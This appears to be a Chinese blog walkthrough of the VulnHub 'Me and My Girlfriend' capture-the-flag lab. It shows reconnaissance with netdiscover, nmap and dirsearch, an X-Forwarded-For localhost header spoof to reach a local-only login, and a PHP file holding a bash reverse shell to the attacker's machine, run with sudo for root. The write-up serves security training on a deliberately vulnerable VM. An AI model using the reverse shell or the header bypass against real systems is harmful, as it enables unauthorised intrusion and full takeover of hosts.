Me and My Girlfriend靶机实验

目录

靶机描述:

准备:

信息收集(一键三连IP、端口、目录扫描)

ip:

端口扫描:

目录扫描:

需要用到kali中的dirsearch。

漏洞分析

渗透攻击

提权:

这里我们可以尝试使用漏洞检查脚本

靶机的下载地址:Me and My Girlfriend: 1 ~ VulnHub

靶机描述:

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

Flag:

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

准备:

1.下载镜像,导入VMvare

2.虚拟机的网络适配器需要由桥接模式改为NAT模式(这样才能给靶机分配一个ip)

3.打开靶机虚拟机

4.打开攻击机kali

信息收集(一键三连IP、端口、目录扫描)

ip:

在攻击机kali中输入

netdiscover

发现靶机的ip为192.168.159.141

 端口扫描:

nmap -p- -A 192.168.159.141

发现开放了22、80端口

 22端口的ssh服务在1.0版本的时候是有漏洞的,但这里是2.0版本,漏洞很少。

目录扫描:

需要用到kali中的dirsearch

第一次使用需要安装diesearch

安装之前建议先更新,更新要进入超级用户

sudo su-
apt-get update
apt-get install dirsearch

dirsearch安装完成进行目录扫描

dirsearch -u http://192.168.159.141 -e*

观察不同颜色的目录

漏洞分析

端口:

打开了80和22端口

22端口的ssh服务在1.0版本的时候是有漏洞的,但这里是2.0版本,漏洞很少。可能用到爆破,但是我们没有字典。

目录扫描:

扫描到的目录中,robots.txt里有一个文件。(查重文件,里面有不允许我们进行查重的目录)

进入robots.txt 敏感信息泄露  同时爆露出一个新的页面heyhoo.txt

进入heyhoo.txt

 没有有用的信息

  登录页面:

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!

页面信息提示我们本地登录

渗透攻击

此时本地登录需要用到X-F-F请求头

X-Forwarded-ForXFF

是用来识别通过HTTP代理负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段

我们通过添加这个字段,来让服务器识别我们为本地登录。

在bp proxy模块下的Options的Match and Replace中添加一条匹配替换规则。

X-Forwarded-For: localhost

首先,我们先来使用本地登录

在登录页面抓一个包,此时X-F-F响应头已经完成

把包放掉,进入本地主页

登录:

弱口令爆破失败

注册:

但是注册一直不成功。

这里我借鉴了别人的账号、密码

已知打开了22端口,且获得了账号密码,此时进行ssh连接

使用shell工具进行连接

这里连接到ssh后对alice的文件进行查看,发现

Flag1

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

提权:

使用漏洞检查脚本

通过python简单的起一个http服务。

python2 -m SimpleHTTPServer

然后在目标靶机上拉取提权检查脚本。

wget http://192.168.11.135:8000/LinEnum.sh 

这里的LinEnum.sh需要现在github上面下载

下载地址:https://github.com/rebootuser/LinEnum

 LinEnum.sh文件放在桌面

然后在目标靶机上拉取提权检查脚本。

wget http://192.168.159.135:8000/LinEnum.sh

 给权限并执行

chmod 777 LinEnum.sh
./ LinEnum.sh

 

我们可以在不提供密码的情况下sudo,可以在/usr/bin/php利用

我们可以去利用。

在finalshell中 vim 1.php

写一个php脚本。

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.159.135/10086 0>&1'");

?>

 kali开启一个监听10086端口

 使用sudo命令执行脚本。

sudo php 1.php

因为我们是以sudo(root权限)来执行脚本的,所以会反弹过去root权限的shell。

Cd ..

Cd ..

Ls

Flag2

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值